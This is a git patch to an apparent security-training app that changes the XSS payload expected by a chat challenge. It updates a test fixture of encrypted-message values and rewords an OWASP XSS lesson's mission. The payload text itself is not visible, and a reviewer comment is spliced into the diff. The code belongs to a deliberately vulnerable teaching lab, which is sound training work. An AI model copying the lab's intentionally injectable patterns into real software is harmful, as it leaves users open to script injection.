From 963e73cecc2fac679f918b170968f2e89bc96415 Mon Sep 17 00:00:00 2001
From: paul-ion
Date: Thu, 28 Sep 2023 21:16:18 -0400
Subject: [PATCH] Change the type of XSS payload

---
 hackerden/front/chat-api.js | 2 +-
 hackerden/front/test/chat.test.js | 3 +--
 .../static/lessons/secondDegreeBlackBelt/definitions.json | 2 +-
 3 files changed, 3 insertions(+), 4 deletions(-)

diff --git a/hackerden/front/chat-api.js b/hackerden/front/chat-api.js
index 8939b043..d5f5f3f0 100644
--- a/hackerden/front/chat-api.js
+++ b/hackerden/front/chat-api.js
@@ -152,7 +152,7 @@ postMessage = async(req,resp) => {
 validateMessage = (message, challengeCodeUrl) => {
 //check integrity
- var toHash = ""+message.pubKey;
+ var toHash = ""+message.pubKey;
 var hash = crypto.createHash('sha256').update(toHash).digest('hex');
 if(message.integrity===hash){
diff --git a/hackerden/front/test/chat.test.js b/hackerden/front/test/chat.test.js
index fd5c061c..c3f5630f 100644
--- a/hackerden/front/test/chat.test.js
+++ b/hackerden/front/test/chat.test.js
@@ -148,8 +148,7 @@ describe('Chat', function () {
 it('should pass challenge for the correct encrypted message', async function () {
 let mockResp = new MockResponse()
 let jwt = chatApi.sign({"sub":"unit_test","permissions":["currentuser","messages"]})
- let body = {"type":"encMessage","encMess":"OHqH+QeS1rUXqJ+l+DFGzao3XwyuU8PIm2TxcZzkq2AaCte3P6rwJtkPX8BBSQ5WzeP2H8Z9cASgM4BgXRi10IshIHw7J+5DeAYs5MkvVCXodSVSyjZatSstUdjWEiL+YWVhbgH7Yy41+CjufU/dKmV56Phmsgnj1ba270qwlEM=","pubKey":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCm/+WgoP8bEMtSk2XInAM4O7i+Tylrrh+1G4LmyLElbyfZUyqBcvGFrBn7rbX2FxZ6xGegTEjzqcNlnTMACM0CeSyPVZ0dSO13eduhwYFY/IMZ/78JYGLu9H045gVB9Ati+2nRfr/Qlxg7W2WO4Lf1eWOVRX/i46outeXhJo3XdwIDAQAB","date":"2023-09-28, 8:40:43 p.m.","integrity":"e745bbd9037587dead485b997be1d7dba1cfdb6f855ae8d7746828f8c587c1c2"}
-
+ let body = {"type":"encMessage","encMess":"IMVeI6CzUuGCPlmLkC0R4egENfq3jQfXyHnkUSjHz82vDbjXmdWTa7yPMFU3cHkY9dHV8HsboAb+UXJk3JQKkStNa1sgk2R7AmIUHlnv0y8piXvVetUXA5xsqpk5MA251XBjxb4+KVAzRv5EG3B3i0rdg+nwv6WOgzAlq5fGIPo=","pubKey":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWedriMgCBBBChO6WRXRk0nKPrfwrou/kW8MprApyARm9Xk3gU5z5Zlikr3CCp0B+pJx4wzYGSedX4pEXCRDuDhn6KJ7R1vFjX0T+LTBdcMXlNgXkExXjRqWoryeQZJG3MxmOnZ1aikIn4QbIcBxIRyzNBFd5zr7lo5dn/1ahSpQIDAQAB","date":"9/28/2023, 9:01:26 PM","integrity":"779f4468eeb46a5a44848be3da3701ed29098f96170199b51d853b0d52bb8b6f"}
 await chatApi.postMessage({"body":body, "path":"/messages", "headers":{"authorization":`Bearer ${jwt}`}}, mockResp)
 assert.equal(mockResp.statusCode, 200)
 assert.equal(mockResp.responseBody,"Message received.")
diff --git a/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json b/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
index 0e9109af..9cc6cdf2 100644
--- a/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
+++ b/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
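Review bot: The replacement `let body = {...}` fixture is an opaque encMess/pubKey/date/integrity blob with no note on how it was produced, so the next time the expected plaintext changes (as it did in this commit) someone has to re-capture all four values by hand and cannot tell which are derived. A comment above the line such as `// Fixture recorded from a client session: encMess is the ciphertext for the pubKey below (presumably RSA, given the SPKI prefix); integrity is sha256(pubKey), which is what validateMessage in chat-api.js checks` would make the dependency explicit. The `integrity` value in particular could be computed in the test from `body.pubKey` rather than hard-coded, assuming the test module can reach node's crypto. The `date` field also moved from `"2023-09-28, 8:40:43 p.m."` to `"9/28/2023, 9:01:26 PM"`, which looks like a browser-locale string; if the server ever parses it, this test's outcome may depend on locale, which is worth confirming.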
@@ -43,7 +43,7 @@
 "description": "owasp2017xss.html",
 "attackGram":"xss.png",
 "codeBlockIds":["neutralizeOutput","inputAllowListing","requestForgeryPrevention"],
- "mission":"Alter the html code of the page by inserting the following code: "
+ "mission":"Alter the html code of the page by inserting the following tag: "
 },
 {
 "id":"owasp2017injection",